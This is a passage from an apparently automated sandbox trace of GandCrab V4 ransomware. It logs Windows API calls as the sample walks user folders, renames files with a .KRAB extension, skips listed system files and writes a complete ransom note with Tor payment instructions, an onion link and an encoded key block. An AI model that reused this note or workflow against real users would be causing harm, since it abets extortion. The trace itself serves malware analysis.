DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0059.760] WriteFile (in: hFile=0x3ac, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338eaa0, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338eaa0*=0x1f6e, lpOverlapped=0x0) returned 1 [0059.761] CloseHandle (hObject=0x3ac) returned 1 [0059.761] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0059.761] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0059.762] GetSystemTime (in: lpSystemTime=0x2ea0400 | out: lpSystemTime=0x2ea0400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x6, wMilliseconds=0x3c2)) [0059.762] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0059.762] GetWindowsDirectoryW (in: lpBuffer=0x2f30000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0059.762] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f30200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f30600, lpMaximumComponentLength=0x2f30608, lpFileSystemFlags=0x2f30604, lpFileSystemNameBuffer=0x2f30400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f30600*=0xd2ca4def, lpMaximumComponentLength=0x2f30608*=0xff, lpFileSystemFlags=0x2f30604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0059.762] wsprintfW (in: param_1=0x2ea0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\d2ca4a08d2ca4dee3d.lock") returned 89 [0059.762] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\internet explorer\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x3ac [0059.763] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0059.763] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0059.763] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\") returned 66 [0059.763] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\*" [0059.763] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\*", lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 0xfbd960 [0059.764] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0059.764] FindNextFileW (in: hFindFile=0xfbd960, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0059.764] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0059.764] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0059.764] FindNextFileW (in: hFindFile=0xfbd960, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0059.764] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0059.764] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0059.764] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\d2ca4a08d2ca4dee3d.lock" [0059.764] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0059.764] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 94 [0059.764] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\d2ca4a08d2ca4dee3d.lock") returned 89 [0059.764] lstrlenW (lpString=".lock") returned 5 [0059.764] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0059.765] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".lock ") returned 6 [0059.765] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0059.765] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0059.765] FindNextFileW (in: hFindFile=0xfbd960, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0059.765] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0059.765] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0059.765] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\KRAB-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\KRAB-DECRYPT.txt" [0059.765] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0059.766] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\KRAB-DECRYPT.txt.KRAB") returned 87 [0059.766] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\KRAB-DECRYPT.txt") returned 82 [0059.766] lstrlenW (lpString=".txt") returned 4 [0059.766] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0059.766] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".txt ") returned 5 [0059.766] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0059.766] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\KRAB-DECRYPT.txt") returned 82 [0059.767] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\KRAB-DECRYPT.txt") returned 82 [0059.767] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0059.767] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0059.767] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0059.767] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0059.767] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0059.767] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0059.767] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0059.767] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0059.767] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0059.767] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0059.767] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0059.767] FindNextFileW (in: hFindFile=0xfbd960, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0059.767] lstrcmpW (lpString1="Quick Launch", lpString2=".") returned 1 [0059.767] lstrcmpW (lpString1="Quick Launch", lpString2="..") returned 1 [0059.767] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\", lpString2="Quick Launch" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch" [0059.767] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\" [0059.767] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2ea0000 [0059.768] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0059.768] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0059.768] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0059.768] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0059.768] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0059.768] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0059.768] wsprintfW (in: param_1=0x2ea0200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\\\KRAB-DECRYPT.txt") returned 96 [0059.769] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x440 [0059.769] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\nlAQAAHPTUHGrjb/dcqUrzDS2xomeC8P4CUSPNAOL+0Mo/RbLr0OaWU1FJb00XfFHXj6tOuf3fPEItNktL2VhtINGOMGKEAUgRHIwxSGaKwcSkEjDUL0HUwplREArY2eQK/2FlKmtVxY2cgAjLoWFXtwo2gEK4a1eyVpOdA/5PKA19vmu9D7IWlFZ8M2v2HcmX1WFwMSKKyCPyE3I12HtIyga2yppmGj/0kbeo4Pyss0DfwD9qQhlmbNwHCOobnSofdvP3cINJt0T+mj6E/gguxJb77VutzLS7ATQylX2An2d2MzGDkSiNzUWV0yDTYzmL5WDSsSyVbWoOteqpx5W43Cfpby5H7iD4Mk5vDzBWPVFeBH4GhKSNudNQl6iOb1l4eeUMuEBXGw0+BpkUrUAgQjBWLbJ6CleUr6MmODOH6A7Jhf60sNPZMijoWaqeecabt0KEf7vwtAKjxeXkDnboIObW61GiYye3Y4Tx1l6X4ZFSnOs4j5jePpy6IWD50Buvy4RFZAKh09rDrTVp5PPV5K0wx5ROUVxEFDMbKemGWn2kbJiiMXWKf9il9ecR7Vj6B9X2QxCxUUzPoOCetcS51SFmTzpNC24BpHiYhlhwBirS7mEqg9eHAs2+76DlthH0IYBlLrEZfZyF2GmyxnNSuiRvf66muc7RQYfG3jxGAECcWKNLqKv8fvy6Z8TXe6Wy3TAJ9Bs4xTAPNS0SMF465Ku6H3cEM/+Sga6KajwZhU3AgixnVgyRE321c0dFCBWzWXYlI72JWaaZIHuktcbpqOdgIM0s1zRRiik4jAuC9jbkuK4dcgArE7p/ZEF5efpIhovrn/JleylI8aSPNqecB9NGmRzRYsl1yx7R79uHvMfZXs9u6R7v6sJyePFcv2fFnDq/8LyXgfBE9ECjLuiUlSkGewajMUrZ37SpbSW8OrKVHO/wBgi22J5C1kUjTYx7CQfDqZArf9qjhD5TjMiNMJUTOcANT1k8LdJCX5YnEkqbql9zAKGPD3h85JtJy5d5qZmc1qVDvNq4JgortqMJN+wJ1cbi0dC0ZupdUMXdEyil5EVrOYjd7OcK256OyLJexaPYNoLMT7nNQFQdBAdgxrP1A2j17iR9Rncy0lG27vyzvnlxBJHtN4rzwPyJcWjijdp+tPdfwpkuUhL1s780j4MPPa6ZSqrbN1dVzXyLYpgTfUJlmuliMYsyPoNF0wncUp6xOYOyeuFYcAYzh6kio0hS/OQfq9DULy4jlRsz4upLH/t6I4C2/8Dhtc9am+2z9kXRqxFGT2X4svMmQoZzcM7WuEljG+iZFnGvqeC8n5vHYUfpc5fDXIAr/3POwA8reJF9MuTQQ1Y71BT3fv8E7sTer0XVOuLq5R4mK7sEM2n3/s8Xg1stfLsHdFcp4Hmv7zJXtlAL+R4H9W/nSZPojs1+CA3f3LfcV0a7HpDCnE+3xAWSnFQ2gRJqfwbzuEDyyCVnlyuJ3gtkbgNzq9B1APP/reqFbD0NTG+Qbvjfy1WKWsuD6289ARnmzQdZfMJBKc6RFzabP8o+FTdQ528K5/LT7x00/WeKSnwRm9OwlEw+VgWABWgavtON3e6mnQGl0Ht3WD/SoiTiUQhaoEEUIhq2bMJGacz0QBGGZmiesqKc5BNYY47mlOBt90VgLBU4CrLlcekD1QKjwWIv7VZ/6d9hWbB8r/E0K0I3RLvsz5vWO2nXOYF4tjdvIFwTL7vhZLqD68CF4elxti9nkRp6gejjvBin0GKFE4sn+7ygICF6nm51nbjx2PCS9UqKQVB18bAq1wqNncQG3eriEdZiQnDmTTBJwZ6wxpzlzgiHPxH2MQl59eCy06ZlQ4pRy8AIZxYSs8MjywVkVMf5xfLKSSVC62MPhaeUAB6K7uhE53Kh/oFl2ty6x3FceOAGIk+6qZNV46mVnA0GY1UlOP7S+iVlY0LkPprvD5AwUQwkDA3J2EcOBy5zS0VDHF/IytPJedv/7il5EehJa3AjJJxYGvWERQaYZIUHY/zL8TGo2R8/ZR5MxJqHNldb8Qd8e6doJuxjxiJYrhGVvyhtJA622V6kMSz5u9Zt2BKOap2t+iec6qvzJ66awl54zVCYGCWnYUJ0Gr+HJQiCb+f9SsuUKy0pCXHEtL7hiZI7EOOMD7fkCREB/rydvt9VVgNLaxwvILFzP8c8FdqundPbfSwa3uorXdvHPZwzmxgXTCDqSdOEPl1K4/SIPmI5XHa0B26K6PumAdOtmc=\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0059.769] WriteFile (in: hFile=0x440, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338e820, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338e820*=0x1f6e, lpOverlapped=0x0) returned 1 [0059.770] CloseHandle (hObject=0x440) returned 1 [0059.771] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0059.771] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0059.771] GetSystemTime (in: lpSystemTime=0x2ea0400 | out: lpSystemTime=0x2ea0400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x6, wMilliseconds=0x3d1)) [0059.772] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0059.772] GetWindowsDirectoryW (in: lpBuffer=0x2f30000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0059.772] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f30200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f30600, lpMaximumComponentLength=0x2f30608, lpFileSystemFlags=0x2f30604, lpFileSystemNameBuffer=0x2f30400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f30600*=0xd2ca4def, lpMaximumComponentLength=0x2f30608*=0xff, lpFileSystemFlags=0x2f30604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0059.772] wsprintfW (in: param_1=0x2ea0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\d2ca4a08d2ca4dee3d.lock") returned 102 [0059.772] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x440 [0059.773] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0059.774] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0059.774] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\") returned 79 [0059.774] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\*" [0059.774] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\*", lpFindFileData=0x338e850 | out: lpFindFileData=0x338e850) returned 0xfbd420 [0059.774] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0059.774] FindNextFileW (in: hFindFile=0xfbd420, lpFindFileData=0x338e850 | out: lpFindFileData=0x338e850) returned 1 [0059.774] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0059.774] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0059.774] FindNextFileW (in: hFindFile=0xfbd420, lpFindFileData=0x338e850 | out: lpFindFileData=0x338e850) returned 1 [0059.774] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0059.774] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0059.774] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\d2ca4a08d2ca4dee3d.lock" [0059.774] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0059.775] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 107 [0059.775] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\d2ca4a08d2ca4dee3d.lock") returned 102 [0059.775] lstrlenW (lpString=".lock") returned 5 [0059.775] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0059.775] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".lock ") returned 6 [0059.775] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0059.775] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0059.776] FindNextFileW (in: hFindFile=0xfbd420, lpFindFileData=0x338e850 | out: lpFindFileData=0x338e850) returned 1 [0059.776] lstrcmpW (lpString1="desktop.ini", lpString2=".") returned 1 [0059.776] lstrcmpW (lpString1="desktop.ini", lpString2="..") returned 1 [0059.776] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\", lpString2="desktop.ini" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\desktop.ini") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\desktop.ini" [0059.776] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0059.776] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\desktop.ini.KRAB") returned 95 [0059.776] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\desktop.ini") returned 90 [0059.776] lstrlenW (lpString=".ini") returned 4 [0059.776] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0059.777] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".ini ") returned 5 [0059.777] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0059.777] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\desktop.ini") returned 90 [0059.777] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\desktop.ini") returned 90 [0059.777] lstrcmpiW (lpString1="desktop.ini", lpString2="desktop.ini") returned 0 [0059.777] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0059.777] FindNextFileW (in: hFindFile=0xfbd420, lpFindFileData=0x338e850 | out: lpFindFileData=0x338e850) returned 1 [0059.777] lstrcmpW (lpString1="Google Chrome.lnk", lpString2=".") returned 1 [0059.777] lstrcmpW (lpString1="Google Chrome.lnk", lpString2="..") returned 1 [0059.777] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\", lpString2="Google Chrome.lnk" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Google Chrome.lnk") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Google Chrome.lnk" [0059.777] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0059.778] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Google Chrome.lnk.KRAB") returned 101 [0059.778] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Google Chrome.lnk") returned 96 [0059.778] lstrlenW (lpString=".lnk") returned 4 [0059.778] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0059.778] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".lnk ") returned 5 [0059.778] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0059.778] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0059.779] FindNextFileW (in: hFindFile=0xfbd420, lpFindFileData=0x338e850 | out: lpFindFileData=0x338e850) returned 1 [0059.779] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0059.779] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0059.779] lstrcatW (in: 